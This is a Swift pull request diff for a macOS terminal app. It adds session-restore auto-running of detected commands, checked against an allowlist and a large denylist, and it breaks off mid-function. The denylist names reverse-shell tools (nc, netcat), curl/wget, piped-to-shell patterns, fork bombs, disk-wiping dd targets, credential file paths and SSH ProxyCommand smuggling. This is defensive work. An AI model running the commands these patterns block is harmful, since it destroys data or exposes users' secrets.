### PR TITLE
feat: auto-restore terminal commands on session restore

### DIFF
--- a/Sources/AppDelegate.swift
+++ b/Sources/AppDelegate.swift
@@ -1477,23 +1477,26 @@ final class AppDelegate: NSObject, NSApplicationDelegate, UNUserNotificationCent
     }
 
     func applicationShouldTerminate(_ sender: NSApplication) -> NSApplication.TerminateReply {
-        isTerminatingApp = true
+        // Precautionary save; final save with sync refresh happens in applicationWillTerminate
         _ = saveSessionSnapshot(includeScrollback: true, removeWhenEmpty: false)
 
         // Tagged DEV builds are ephemeral, skip quit confirmation entirely.
         if SocketControlSettings.isTaggedDevBuild() {
+            isTerminatingApp = true
             return .terminateNow
         }
 
         // If the user already confirmed via the Cmd+Q shortcut warning dialog
         // (handleQuitShortcutWarning), skip the check to avoid a second alert.
         if isQuitWarningConfirmed {
+            isTerminatingApp = true
             return .terminateNow
         }
 
         // Respect the "Warn Before Quit" setting even when Cmd+Q arrives via
         // the Cmd+Tab app switcher, bypassing handleCustomShortcut.
         guard QuitWarningSettings.isEnabled() else {
+            isTerminatingApp = true
             return .terminateNow
         }
 
@@ -1517,6 +1520,7 @@ final class AppDelegate: NSObject, NSApplicationDelegate, UNUserNotificationCent
             let shouldQuit = response == .alertFirstButtonReturn
             if shouldQuit {
                 self.isQuitWarningConfirmed = true
+                self.isTerminatingApp = true
             } else {
                 // Reset so that the next quit attempt can show the dialog again.
                 self.isTerminatingApp = false
@@ -3291,6 +3295,16 @@ final class AppDelegate: NSObject, NSApplicationDelegate, UNUserNotificationCent
         }
 #endif
 
+        // Refresh foreground process cache before building snapshot.
+        // - Quit saves: block with timeout to get fresh data (user expects accurate state)
+        // - Autosaves: fire-and-forget refresh for next save; current save uses last cached values
+        //   (intentional one-save lag to avoid blocking UI during periodic autosaves)
+        if isTerminatingApp {
+            refreshForegroundProcessCacheSync()
+        } else {
+            refreshForegroundProcessCacheAsync()
+        }
+
         guard let snapshot = buildSessionSnapshot(
             includeScrollback: includeScrollback,
             restorableAgentIndex: restorableAgentIndex
@@ -3622,6 +3636,24 @@ final class AppDelegate: NSObject, NSApplicationDelegate, UNUserNotificationCent
             createdAt: Date().timeIntervalSince1970,
             windows: windows
         )
+    }
+
+    /// Refresh the foreground process cache for all terminal panels (async, non-blocking).
+    private func refreshForegroundProcessCacheAsync() {
+        // Dedupe TTY names to avoid redundant ps scans
+        let allTTYNames = Set(mainWindowContexts.values.flatMap { context in
+            context.tabManager.allTerminalTTYNames()
+        })
+        SessionForegroundProcessCache.shared.refresh(ttyNames: Array(allTTYNames))
+    }
+
+    /// Refresh the foreground process cache for all terminal panels (blocking, for quit).
+    private func refreshForegroundProcessCacheSync() {
+        // Dedupe TTY names to avoid redundant ps scans
+        let allTTYNames = Set(mainWindowContexts.values.flatMap { context in
+            context.tabManager.allTerminalTTYNames()
+        })
+        SessionForegroundProcessCache.shared.refreshSync(ttyNames: Array(allTTYNames))
     }
 
 #if DEBUG

--- a/Sources/GhosttyTerminalView.swift
+++ b/Sources/GhosttyTerminalView.swift
@@ -4192,7 +4192,6 @@ final class TerminalSurface: Identifiable, ObservableObject {
     private let workingDirectory: String?
     let initialCommand: String?
     let tmuxStartCommand: String?
-    let initialInput: String?
     private let initialEnvironmentOverrides: [String: String]
     var requestedWorkingDirectory: String? { workingDirectory }
     let focusPlacement: TerminalSurfaceFocusPlacement
@@ -4283,6 +4282,14 @@ final class TerminalSurface: Identifiable, ObservableObject {
     private(set) var lastSearchNeedle = ""
     private var searchNeedleCancellable: AnyCancellable?
     var currentKeyStateIndicatorText: String? { surfaceView.currentKeyStateIndicatorText }
+
+    /// Text to send to the shell after it starts (used for session restore commands).
+    /// Unlike `initialCommand`, this doesn't replace the shell - it types into it.
+    /// Cleared after first successful surface creation to prevent replay on recreation.
+    /// `private(set)` exposes the post-normalization value to `@testable` consumers (tests
+    /// can read but not mutate); only this class is allowed to clear/replace it.
+    private(set) var initialInput: String?
+
     init(
         tabId: UUID,
         context: ghostty_surface_context_e,
@@ -4308,8 +4315,7 @@ final class TerminalSurface: Identifiable, ObservableObject {
         self.initialCommand = (trimmedCommand?.isEmpty == false) ? trimmedCommand : nil
         let trimmedTmuxStartCommand = tmuxStartCommand?.trimmingCharacters(in: .whitespacesAndNewlines)
         self.tmuxStartCommand = (trimmedTmuxStartCommand?.isEmpty == false) ? trimmedTmuxStartCommand : nil
-        let trimmedInput = initialInput?.isEmpty == false ? initialInput : nil
-        self.initialInput = trimmedInput
+        self.initialInput = Self.normalizedInitialInput(initialInput)
         self.initialEnvironmentOverrides = Self.mergedNormalizedEnvironment(base: [:], overrides: initialEnvironmentOverrides)
         self.additionalEnvironment = Self.mergedNormalizedEnvironment(base: [:], overrides: additionalEnvironment)
         self.focusPlacement = focusPlacement
@@ -4348,6 +4354,46 @@ final class TerminalSurface: Identifiable, ObservableObject {
         }
         return merged
     }
+
+    /// Normalize `initialInput` received from callers into a newline-free command token, or nil.
+    ///
+    /// Codebase convention: callers are free to append a single trailing `\n` (most do, e.g.
+    /// `RestorableAgentSession.resumeStartupInput`, `CmuxConfigExecutor.prepareShellInputIfAuthorized`,
+    /// `handleSessionDrop`) or pass a bare command (e.g. session-restore auto-detected commands).
+    /// We accept either form, strip at most one trailing `\n`, and reject anything with
+    /// embedded `\n`/`\r` as a defense-in-depth against command-injection. `createSurface`
+    /// is the single place that appends the terminating newline passed to ghostty.
+    static func normalizedInitialInput(_ raw: String?) -> String? {
+        guard let raw, !raw.isEmpty else { return nil }
+        var candidate = raw
+        if candidate.hasSuffix("\n") {
+            candidate.removeLast()
+        }
+        if candidate.contains("\n") || candidate.contains("\r") {
+            return nil
+        }
+        let trimmed = candidate.trimmingCharacters(in: .whitespacesAndNewlines)
+        return trimmed.isEmpty ? nil : trimmed
+    }
+
+    /// Resolve the bytes that ghostty consumes as `surface_config.initial_input` at
+    /// surface creation time.
+    ///
+    /// Contract:
+    /// - Explicit `initialInput` (already passed through `normalizedInitialInput`) wins
+    ///   and gets exactly one trailing `\n` appended so the shell executes the command.
+    /// - Otherwise, `baseConfigInitialInput` (raw bytes from Ghostty's own config layer)
+    ///   is returned BYTE-FOR-BYTE — no trimming, no newline checks. This honors the
+    ///   contract documented in PR #2545: ghostty's startup-input is raw-bytes and any
+    ///   newlines/whitespace in `baseConfig.initialInput` are intentional.
+    static func resolveInitialInput(explicit: String?, baseConfigInitialInput: String?) -> String? {
+        if let explicit, !explicit.isEmpty {
+            return explicit + "\n"
+        }
+        guard let base = baseConfigInitialInput, !base.isEmpty else { return nil }
+        return base
+    }
+
 
     func isAttached(to view: GhosttyNSView) -> Bool {
         attachedView === view && surface != nil
@@ -5046,12 +5092,15 @@ final class TerminalSurface: Identifiable, ObservableObject {
             }
             return baseConfig.command
         }()
-        let resolvedInitialInput: String? = {
-            if let initialInput, !initialInput.isEmpty {
-                return initialInput
-            }
-            return baseConfig.initialInput
-        }()
+        let resolvedInitialInput = Self.resolveInitialInput(
+            explicit: initialInput,
+            baseConfigInitialInput: baseConfig.initialInput
+        )
+#if DEBUG
+        if resolvedInitialInput != nil {
+            cmuxDebugLog("surface.createSurface surface=\(id.uuidString.prefix(5)) hasInitialInput=1")
+        }
+#endif
         func withOptionalCString<T>(_ value: String?, _ body: (UnsafePointer<CChar>?) -> T) -> T {
             guard let value else {
                 return body(nil)
@@ -5095,6 +5144,10 @@ final class TerminalSurface: Identifiable, ObservableObject {
             return
         }
         guard let createdSurface = surface else { return }
+
+        // Clear initialInput after first successful use to prevent replay on surface recreation
+        initialInput = nil
+
         TerminalSurfaceRegistry.shared.registerRuntimeSurface(createdSurface, ownerId: id)
         recordRuntimeSurfaceCreation()
 

--- a/Sources/Panels/TerminalPanel.swift
+++ b/Sources/Panels/TerminalPanel.swift
@@ -87,6 +87,11 @@ final class TerminalPanel: Panel, ObservableObject {
     }
 
     /// Create a new terminal panel with a fresh surface
+    ///
+    /// - Parameters:
+    ///   - initialCommand: Replaces the shell with this command (exits when done)
+    ///   - initialInput: Types this into the shell after it starts (for session restore).
+    ///     Must not contain newlines or carriage returns (blocked as command injection vectors).
     convenience init(
         workspaceId: UUID,
         context: ghostty_surface_context_e = GHOSTTY_SURFACE_CONTEXT_SPLIT,

--- a/Sources/SessionPersistence.swift
+++ b/Sources/SessionPersistence.swift
@@ -224,6 +224,14 @@ struct SessionGitBranchSnapshot: Codable, Sendable {
 struct SessionTerminalPanelSnapshot: Codable, Sendable {
     var workingDirectory: String?
     var scrollback: String?
+    /// Command auto-detected from foreground process when session was saved.
+    /// Used to restore the command on next app launch if it passes allowlist validation.
+    var detectedCommand: String?
+    /// Whether this terminal was remote-backed (SSH) when saved.
+    /// Used to restore local terminals correctly in a remote-configured workspace.
+    var isRemoteBacked: Bool?
+    /// Restorable agent session (Claude Code / Codex) attached to this terminal.
+    /// When present, takes precedence over `detectedCommand` on restore.
     var agent: SessionRestorableAgentSnapshot?
     var tmuxStartCommand: String?
 }
@@ -537,5 +545,833 @@ enum SessionScrollbackReplayStore {
         } catch {
             return nil
         }
+    }
+}
+
+// MARK: - Session Restore Command Settings
+
+enum SessionRestoreCommandSettings {
+    static let enabledKey = "sessionRestoreCommandsEnabled"
+    static let allowlistKey = "sessionRestoreCommandAllowlist"
+    static let defaultEnabled = true
+
+    /// Default allowlist of commands safe to auto-restore.
+    /// Use `*` suffix for prefix matching (command + any arguments).
+    static let defaultAllowlistPatterns = [
+        // Coding agents
+        "opencode *",
+        "claude *",
+        "codex *",
+        "aider *",
+        // Dev servers
+        "npm run dev *",
+        "npm start *",
+        "yarn dev *",
+        "pnpm dev *",
+        "bun dev *",
+        "bun run dev *",
+        // Rust
+        "cargo run *",
+        // Python
+        "uvicorn *",
+        "flask run *",
+        // Watchers/logs
+        "tail -f *",
+        // Remote sessions
+        "ssh *",
+        "mosh *",
+    ]
+
+    static func isEnabled(defaults: UserDefaults = .standard) -> Bool {
+        if defaults.object(forKey: enabledKey) == nil {
+            return defaultEnabled
+        }
+        return defaults.bool(forKey: enabledKey)
+    }
+
+    static func normalizedAllowlistPatterns(defaults: UserDefaults = .standard) -> [String] {
+        normalizedAllowlistPatterns(rawValue: defaults.string(forKey: allowlistKey))
+    }
+
+    static func normalizedAllowlistPatterns(rawValue: String?) -> [String] {
+        // If user provided an explicit value (even if empty/whitespace-only), respect it.
+        // Only fall back to defaults when rawValue is nil (not set at all).
+        guard let rawValue else {
+            return defaultAllowlistPatterns
+        }
+        let parsed = parsePatterns(from: rawValue)
+        // If user explicitly cleared the allowlist, return empty (disables all restores)
+        return parsed
+    }
+
+    private static func parsePatterns(from text: String) -> [String] {
+        text
+            .components(separatedBy: .newlines)
+            .map { $0.trimmingCharacters(in: .whitespaces) }
+            .filter { !$0.isEmpty && !$0.hasPrefix("#") }
+    }
+
+    // MARK: - Hardcoded Denylist (Safety Net)
+
+    // MARK: - Denylist Configuration
+    //
+    // Defense-in-depth: These lists block dangerous commands from being auto-restored.
+    // The primary security boundary is the user's allowlist, but these patterns catch
+    // catastrophic mistakes even if the allowlist is too permissive.
+    //
+    // Philosophy: Start aggressive, loosen as needed. False positives are safer than
+    // allowing destructive commands to auto-restore.
+
+    /// Dangerous executables blocked anywhere in a command (word-boundary aware).
+    /// Matches: "sudo rm", "cd /tmp && sudo", "/usr/bin/sudo", "$(curl ...)", etc.
+    /// Does NOT match: "sudoku", "rm-old-files" (no word boundary).
+    /// Uses Set for O(1) lookup.
+    private static let dangerousExecutables: Set<String> = [
+        // Privilege escalation
+        "sudo", "doas", "su", "pkexec", "runas",
+        // Destructive file operations
+        "rm", "rmdir", "shred", "srm", "unlink", "mv",
+        // Disk/partition operations
+        "dd", "mkfs", "newfs", "fdisk", "parted", "diskutil", "hdparm", "badblocks",
+        // System control
+        "reboot", "shutdown", "halt", "poweroff", "init",
+        // Permission/ownership changes
+        "chmod", "chown", "chgrp", "chattr", "setfacl",
+        // Process control
+        "kill", "killall", "pkill", "xkill",
+        // Remote code execution vectors
+        "curl", "wget",
+        // Filesystem check (can destroy encrypted volumes)
+        "fsck",
+        // Database admin
+        "dropdb", "dropuser", "createdb", "createuser",
+        // Cron/scheduler
+        "crontab",
+        // macOS system integrity
+        "csrutil", "nvram", "bless",
+        // Network/firewall
+        "iptables", "pfctl", "networksetup",
+        // Dangerous archivers (can overwrite system files as root)
+        "tar",
+        // Kernel module manipulation
+        "modprobe", "insmod", "rmmod", "modinfo",
+        // User/group manipulation
+        "useradd", "userdel", "usermod", "groupadd", "groupdel", "groupmod",
+        "chpasswd", "passwd",
+        // Additional archiver with dangerous options
+        "rsync",
+        // Command execution helpers
+        "xargs", "find",
+        // Netcat - reverse shell vector
+        "nc", "ncat", "netcat",
+        // Package managers (install-only, no run/script capability)
+        // These modify system state and have no legitimate auto-restore use case.
+        // Note: npm/yarn/pnpm/bun are NOT here because they have `run`/`dev` scripts.
+        "apt", "apt-get", "dpkg", "aptitude",
+        "yum", "dnf", "rpm",
+        "brew", "port",
+        "pacman", "yay", "paru", "makepkg",
+        "zypper",
+        "apk",
+        "snap", "flatpak",
+        "pip", "pip3", "pipx",
+        "gem",
+        "cpan", "cpanm",
+        // "go install" downloads + installs arbitrary binaries; "go" itself is not
+        // blocked because users may add "go run *" or "go test *" to their allowlist.
+    ]
+
+    /// Substrings that block a command if found anywhere.
+    /// Used for: credentials, destructive operations, sensitive file access.
+    private static let denylistContains = [
+        // API keys and tokens
+        "--api-key=", "--api-key ",
+        "--apikey=", "--apikey ",
+        "--token=", "--token ",
+        "--access-token=", "--access-token ",
+        "--auth-token=", "--auth-token ",
+        "--bearer=", "--bearer ",
+        "--secret=", "--secret ",
+        "--client-secret=", "--client-secret ",
+        // Passwords (long flags only; MySQL -p handled separately)
+        "--password=", "--password ",
+        "--passwd=", "--passwd ",
+        // AWS credentials
+        "--aws-access-key-id=", "--aws-secret-access-key=",
+        "AWS_ACCESS_KEY_ID=", "AWS_SECRET_ACCESS_KEY=",
+        // SSH/auth keys
+        "--private-key=", "--private-key ",
+        "--ssh-key=", "--ssh-key ",
+        // SSH password wrappers and inline credentials
+        "sshpass ",
+        ":@",  // user:pass@host syntax
+        // SSH options that execute local helpers or replace the local transport.
+        // Without these, an allowlisted "ssh *" can smuggle arbitrary code via
+        // -o LocalCommand=... or -o ProxyCommand=... and have it re-run on restore.
+        // `permitlocalcommand=...` is caught implicitly by the `localcommand=` substring.
+        "localcommand=", "localcommand ",
+        "proxycommand=", "proxycommand ",
+        // Generic auth
+        "--credentials=", "--credentials ",
+        "--auth=", "--auth ",
+        // Database connection strings
+        "mongodb://", "mongodb+srv://",
+        "postgresql://", "postgres://",
+        "mysql://", "redis://", "amqp://", "rediss://",
+        // Git destructive
+        "git push --force", "git push -f",
+        "git reset --hard",
+        "git clean -f",
+        "git checkout --force",
+        // Database destructive
+        "drop database", "drop table", "drop schema", "drop index",
+        "truncate table", "truncate ",
+        "delete from",
+        // System services
+        "systemctl stop", "systemctl disable", "systemctl mask",
+        "launchctl unload", "launchctl bootout", "launchctl remove",
+        "service stop",
+        // Container destructive
+        "docker system prune",
+        "docker rm -f", "docker container rm -f",
+        "docker volume rm", "docker volume prune",
+        "docker image prune", "docker container prune",
+        "podman system prune", "podman rm -f",
+        // Kubernetes destructive
+        "kubectl delete namespace", "kubectl delete ns",
+        "kubectl delete --all",
+        "kubectl drain", "kubectl cordon",
+        // Environment manipulation
+        "unset PATH",
+        "export PATH=",
+        // Piped shell execution
+        "| sh", "| bash", "| zsh", "| ksh", "| fish",
+        "| /bin/sh", "| /bin/bash", "| /bin/zsh",
+        // History replay
+        "history | sh", "history | bash", "history | zsh",
+        "fc -s",
+        // Command injection via embedded newlines/carriage returns
+        // Defense-in-depth: also blocked at initialInput validation layer
+        "\n", "\r",
+        // Fork bomb
+        ":(){ :|:& };:",
+        // Disk write targets
+        "of=/dev/sd", "of=/dev/nvme", "of=/dev/disk",
+        "> /dev/sd", "> /dev/nvme",
+        // Sensitive file access
+        "/etc/shadow",
+        ".ssh/id_rsa", ".ssh/id_ed25519", ".ssh/id_ecdsa", ".ssh/id_dsa",
+        ".ssh/authorized_keys",
+        ".aws/credentials",
+        ".kube/config",
+        ".npmrc",
+        ".netrc",
+        ".git-credentials",
+        ".docker/config.json",
+        // npm/yarn destructive
+        "npm unpublish",
+        "npm deprecate",
+        // Homebrew destructive (macOS)
+        "brew uninstall --force",
+        "brew remove --force",
+        "brew unlink --force",
+        // SysRq magic key - instant reboot/crash
+        "/proc/sysrq-trigger",
+        "echo b > /proc/sysrq",
+        "echo o > /proc/sysrq",
+        "echo c > /proc/sysrq",
+        // Shell exec redirect - silences shell
+        "exec >",
+        "exec 2>",
+        "exec &>",
+        // Additional disk device targets
+        "of=/dev/hd", "of=/dev/vd", "of=/dev/xvd",
+        "> /dev/hd", "> /dev/vd",
+
+        // Additional fork bomb variants
+        ".() { .|.& };.",
+        "bomb() { bomb | bomb & }; bomb",
+        // Infinite loops that fill disk
+        "while true; do",
+        "for (( ; ; )); do",
+        "while :; do",
+        // LD_PRELOAD injection
+        "LD_PRELOAD=",
+        "LD_LIBRARY_PATH=",
+    ]
+
+    /// Check if a command matches the allowlist.
+    /// - Exact match: "opencode" matches only "opencode"
+    /// - Prefix match: "opencode *" matches "opencode", "opencode --flag", etc.
+    /// - Commands matching the hardcoded denylist are NEVER allowed.
+    /// - Returns false immediately if sessionRestoreCommandsEnabled is disabled.
+    static func isCommandAllowed(_ command: String, defaults: UserDefaults = .standard) -> Bool {
+        guard isEnabled(defaults: defaults) else { return false }
+        return isCommandAllowed(command, rawAllowlist: defaults.string(forKey: allowlistKey))
+    }
+
+    static func isCommandAllowed(_ command: String, rawAllowlist: String?) -> Bool {
+        let normalizedCommand = command.trimmingCharacters(in: .whitespacesAndNewlines)
+        guard !normalizedCommand.isEmpty else { return false }
+
+        // Safety net: hardcoded denylist always blocks, regardless of user allowlist
+        if isCommandDenied(normalizedCommand) {
+            return false
+        }
+
+        let patterns = normalizedAllowlistPatterns(rawValue: rawAllowlist)
+        return patterns.contains { pattern in
+            commandMatchesPattern(normalizedCommand, pattern: pattern)
+        }
+    }
+
+    /// Normalize and validate a restore command in one step.
+    /// Returns the trimmed command if allowed, nil otherwise.
+    /// Use this helper to avoid duplicating trim + allowlist check logic.
+    static func validatedRestoreCommand(_ command: String?) -> String? {
+        guard let command, !command.isEmpty else { return nil }
+        let trimmed = command.trimmingCharacters(in: .whitespacesAndNewlines)
+        guard !trimmed.isEmpty, isCommandAllowed(trimmed) else { return nil }
+        return trimmed
+    }
+
+    /// Check if command matches the hardcoded denylist (case-insensitive for safety)
+    private static func isCommandDenied(_ command: String) -> Bool {
+        let lowercased = command.lowercased()
+
+        // Check if any dangerous executable appears anywhere in the command.
+        // This catches: "sudo rm", "cd /tmp && sudo rm", "echo | rm -rf", "/usr/bin/sudo", etc.
+        if containsDangerousExecutable(lowercased) {
+            return true
+        }
+
+        // Check substring matches (credentials, destructive patterns, sensitive files)
+        for substring in denylistContains {
+            // Special handling for control characters: Swift treats CRLF (\r\n) as a single
+            // grapheme cluster, so `str.contains("\r")` returns false for a CRLF string.
+            // Check at the Unicode scalar level for single control characters.
+            if substring.count == 1, let scalar = substring.unicodeScalars.first,
+               scalar == "\r" || scalar == "\n" {
+                if lowercased.unicodeScalars.contains(scalar) {
+                    return true
+                }
+            } else if lowercased.contains(substring.lowercased()) {
+                return true
+            }
+        }
+
+        // Check MySQL-family commands with -p flag (password)
+        // These tools use -p for password, unlike cargo/flask/npm which use it for port/package
+        // Note: Must check original command because -p (password) vs -P (port) are case-sensitive
+        if isMySQLPasswordCommand(command, lowercasedCommand: lowercased) {
+            return true
+        }
+
+        // SSH agent forwarding (-A enables, -a disables — must be case-sensitive)
+        if isSSHWithAgentForwarding(command) {
+            return true
+        }
+
+        return false
+    }
+
+    /// Check if command is an SSH-family invocation with `-A` (agent forwarding).
+    /// SSH's `-a` (lowercase) DISABLES forwarding (safe), so this match must be case-sensitive
+    /// and we must not consult the lowercased copy used elsewhere in `isCommandDenied`.
+    private static func isSSHWithAgentForwarding(_ command: String) -> Bool {
+        let trimmed = command.trimmingCharacters(in: .whitespaces)
+        let basename = parseLeadingExecutableBasename(trimmed)
+        guard basename == "ssh" || basename == "scp" || basename == "sftp" else { return false }
+        return command.contains(" -A ") || command.contains(" -A\t") || command.hasSuffix(" -A")
+    }
+
+    /// Check if a dangerous executable appears anywhere in the command.
+    /// Looks for word boundaries: start of string, space, /, |, ;, &, `, $(
+    /// This catches both direct invocations and shell-chained commands.
+    private static func containsDangerousExecutable(_ lowercasedCommand: String) -> Bool {
+        // Characters that can precede an executable name. Includes both quote styles
+        // so that `ssh user@host 'rm -rf /'` and equivalents trip the boundary scan.
+        let boundaryChars: Set<Character> = [" ", "\t", "\n", "\r", "/", "|", ";", "&", "`", "(", "'", "\""]
+        // Characters that can follow an executable name (word boundary)
+        let trailingBoundaryChars: Set<Character> = [" ", "\t", ";", "|", "&", ")", "\n", "\"", "'", "`", "$"]
+
+        func hasValidTrailingBoundary(_ index: String.Index) -> Bool {
+            index == lowercasedCommand.endIndex || trailingBoundaryChars.contains(lowercasedCommand[index])
+        }
+
+        for executable in dangerousExecutables {
+            // Check if command starts with the executable (e.g., "rm -rf", "rm;", "rm|")
+            if lowercasedCommand.hasPrefix(executable) {
+                let afterIndex = lowercasedCommand.index(
+                    lowercasedCommand.startIndex,
+                    offsetBy: executable.count,
+                    limitedBy: lowercasedCommand.endIndex
+                ) ?? lowercasedCommand.endIndex
+                if hasValidTrailingBoundary(afterIndex) {
+                    return true
+                }
+            }
+
+            // Check if executable appears after a boundary character
+            // Scan ALL occurrences, not just the first (handles "echo sudoers && sudo rm")
+            for boundary in boundaryChars {
+                let pattern = String(boundary) + executable
+                var searchStart = lowercasedCommand.startIndex
+                while let range = lowercasedCommand.range(
+                    of: pattern,
+                    range: searchStart..<lowercasedCommand.endIndex
+                ) {
+                    // Verify it's followed by end of string or another boundary
+                    let afterIndex = range.upperBound
+                    if hasValidTrailingBoundary(afterIndex) {
+                        return true
+                    }
+                    // Move past this match to find subsequent occurrences
+                    searchStart = lowercasedCommand.index(after: range.lowerBound)
+                }
+            }
+        }
+        return false
+    }
+
+    /// Check if a command is a MySQL-family tool with -p password flag
+    /// MySQL, MariaDB, mysqldump, mysqladmin all use -p for password (case-sensitive: -P is port)
+    private static func isMySQLPasswordCommand(_ command: String, lowercasedCommand: String) -> Bool {
+        let mysqlTools: Set<String> = ["mysql", "mariadb", "mysqldump", "mysqladmin"]
+
+        // Parse the leading shell token (handles quoted paths like '/My App/mysql')
+        let toolName = parseLeadingExecutableBasename(lowercasedCommand)
+        guard mysqlTools.contains(toolName) else { return false }
+
+        // Check if -p flag is present (case-sensitive: -p is password, -P is port)
+        // Must check original command, not lowercased, to preserve case distinction
+        // Matches: -p, -pPASSWORD, -p PASSWORD, -p=PASSWORD
+        return command.contains(" -p") || command.contains(" -p=")
+    }
+
+    /// Parse the leading executable token from a command line, handling shell quoting.
+    /// Returns the basename of the executable (e.g., "mysql" from "'/My App/mysql' --flag")
+    private static func parseLeadingExecutableBasename(_ command: String) -> String {
+        let trimmed = command.trimmingCharacters(in: .whitespaces)
+        guard !trimmed.isEmpty else { return "" }
+
+        var executablePath: String
+        let firstChar = trimmed.first!
+
+        if firstChar == "'" {
+            // Single-quoted: find closing quote, handle escaped quotes
+            if let closeIndex = findClosingSingleQuote(trimmed, startAfter: trimmed.startIndex) {
+                let start = trimmed.index(after: trimmed.startIndex)
+                executablePath = String(trimmed[start..<closeIndex])
+                // Unescape '\'' sequences
+                executablePath = executablePath.replacingOccurrences(of: "'\\''", with: "'")
+            } else {
+                // Unclosed quote, take whole thing minus opening quote
+                executablePath = String(trimmed.dropFirst())
+            }
+        } else if firstChar == "\"" {
+            // Double-quoted: find closing quote
+            if let closeIndex = findClosingDoubleQuote(trimmed, startAfter: trimmed.startIndex) {
+                let start = trimmed.index(after: trimmed.startIndex)
+                executablePath = String(trimmed[start..<closeIndex])
+                // Unescape basic sequences
+                executablePath = executablePath.replacingOccurrences(of: "\\\"", with: "\"")
+                executablePath = executablePath.replacingOccurrences(of: "\\\\", with: "\\")
+            } else {
+                executablePath = String(trimmed.dropFirst())
+            }
+        } else {
+            // Unquoted: take until first whitespace
+            if let spaceIndex = trimmed.firstIndex(where: { $0.isWhitespace }) {
+                executablePath = String(trimmed[..<spaceIndex])
+            } else {
+                executablePath = trimmed
+            }
+        }
+
+        // Extract basename
+        return URL(fileURLWithPath: executablePath).lastPathComponent
+    }
+
+    /// Find closing single quote, handling '\'' escape sequences
+    private static func findClosingSingleQuote(_ s: String, startAfter: String.Index) -> String.Index? {
+        var i = s.index(after: startAfter)
+        while i < s.endIndex {
+            if s[i] == "'" {
+                // Check if this is start of '\'' escape sequence
+                let remaining = s[i...]
+                if remaining.hasPrefix("'\\''") {
+                    // Skip the escape sequence
+                    i = s.index(i, offsetBy: 4, limitedBy: s.endIndex) ?? s.endIndex
+                } else {
+                    return i
+                }
+            } else {
+                i = s.index(after: i)
+            }
+        }
+        return nil
+    }
+
+    /// Find closing double quote, handling backslash escapes
+    private static func findClosingDoubleQuote(_ s: String, startAfter: String.Index) -> String.Index? {
+        var i = s.index(after: startAfter)
+        while i < s.endIndex {
+            if s[i] == "\\" {
+                // Skip next character (escaped)
+                i = s.index(after: i)
+                if i < s.endIndex {
+                    i = s.index(after: i)
+                }
+            } else if s[i] == "\"" {
+                return i
+            } else {
+                i = s.index(after: i)
+            }
+        }
+        return nil
+    }
+
+    private static func commandMatchesPattern(_ command: String, pattern: String) -> Bool {
+        let trimmedPattern = pattern.trimmingCharacters(in: .whitespaces)
+
+        // Extract command basename for matching (handles quoted paths like '/My App/opencode')
+        let commandBasename = parseLeadingExecutableBasename(command)
+        // Reconstruct command with basename: find where args start after the executable
+        let commandWithBasename: String = {
+            let trimmed = command.trimmingCharacters(in: .whitespaces)
+            guard !trimmed.isEmpty else { return commandBasename }
+            let firstChar = trimmed.first!
+            var afterExec: String.Index?
+            if firstChar == "'" {
+                if let close = findClosingSingleQuote(trimmed, startAfter: trimmed.startIndex) {
+                    afterExec = trimmed.index(after: close)
+                }
+            } else if firstChar == "\"" {
+                if let close = findClosingDoubleQuote(trimmed, startAfter: trimmed.startIndex) {
+                    afterExec = trimmed.index(after: close)
+                }
+            } else if let space = trimmed.firstIndex(where: { $0.isWhitespace }) {
+                afterExec = space
+            }
+            if let afterExec, afterExec < trimmed.endIndex {
+                let rest = trimmed[afterExec...].trimmingCharacters(in: .whitespaces)
+                return rest.isEmpty ? commandBasename : "\(commandBasename) \(rest)"
+            }
+            return commandBasename
+        }()
+
+        // Prefix match: "opencode *" matches "opencode", "/usr/bin/opencode --flag", etc.
+        // Also handles tab as argument separator for robustness
+        if trimmedPattern.hasSuffix(" *") {
+            let prefix = String(trimmedPattern.dropLast(2))
+            // Match against both full path command and basename-only version
+            // Check for space or tab as argument separator
+            return command == prefix ||
+                   command.hasPrefix(prefix + " ") || command.hasPrefix(prefix + "\t") ||
+                   commandWithBasename == prefix ||
+                   commandWithBasename.hasPrefix(prefix + " ") || commandWithBasename.hasPrefix(prefix + "\t")
+        }
+
+        // Exact match (also check basename version)
+        return command == trimmedPattern || commandWithBasename == trimmedPattern
+    }
+}
+
+// MARK: - Foreground Process Detection Cache
+
+/// Cache for foreground process detection results to avoid blocking main thread.
+/// Call `refresh(ttyNames:)` periodically from a background queue, then read
+/// cached values synchronously via `cachedCommandLine(forTTY:)`.
+final class SessionForegroundProcessCache {
+    static let shared = SessionForegroundProcessCache()
+
+    private let queue = DispatchQueue(label: "com.cmux.foreground-process-cache", qos: .utility)
+    private var cache: [String: String] = [:]  // ttyName -> commandLine
+    private var unfairLock = os_unfair_lock()
+
+    private init() {}
+
+    /// Refresh cache for the given TTY names. Runs on internal background queue.
+    /// Only caches commands that pass the allowlist to avoid persisting secrets.
+    func refresh(ttyNames: [String]) {
+        queue.async { [self] in
+            var newCache: [String: String] = [:]
+            for ttyName in ttyNames {
+                let normalizedTTY = Self.normalizeTTYName(ttyName)
+                if let detected = SessionForegroundProcessDetector.detect(forTTY: normalizedTTY),
+                   let commandLine = detected.commandLine {
+                    let trimmed = commandLine.trimmingCharacters(in: .whitespacesAndNewlines)
+                    if SessionRestoreCommandSettings.isCommandAllowed(trimmed) {
+                        newCache[normalizedTTY] = trimmed
+                    }
+                }
+            }
+            os_unfair_lock_lock(&unfairLock)
+            cache = newCache
+            os_unfair_lock_unlock(&unfairLock)
+        }
+    }
+
+    /// Refresh cache synchronously with timeout. Falls back to existing cache if timeout exceeded.
+    /// Uses a bounded wait to prevent quit from stalling indefinitely on slow ps/sysctl calls.
+    func refreshSync(ttyNames: [String], timeout: TimeInterval = 2.0) {
+        let semaphore = DispatchSemaphore(value: 0)
+        queue.async { [self] in
+            defer { semaphore.signal() }
+            var newCache: [String: String] = [:]
+            for ttyName in ttyNames {
+                let normalizedTTY = Self.normalizeTTYName(ttyName)
+                if let detected = SessionForegroundProcessDetector.detect(forTTY: normalizedTTY),
+                   let commandLine = detected.commandLine {
+                    let trimmed = commandLine.trimmingCharacters(in: .whitespacesAndNewlines)
+                    if SessionRestoreCommandSettings.isCommandAllowed(trimmed) {
+                        newCache[normalizedTTY] = trimmed
+                    }
+                }
+            }
+            os_unfair_lock_lock(&unfairLock)
+            cache = newCache
+            os_unfair_lock_unlock(&unfairLock)
+        }
+        // Wait with timeout; if exceeded, we use whatever was in cache before
+        _ = semaphore.wait(timeout: .now() + timeout)
+    }
+
+    /// Get cached command line for a TTY. Safe to call from main thread.
+    func cachedCommandLine(forTTY ttyName: String) -> String? {
+        let normalizedTTY = Self.normalizeTTYName(ttyName)
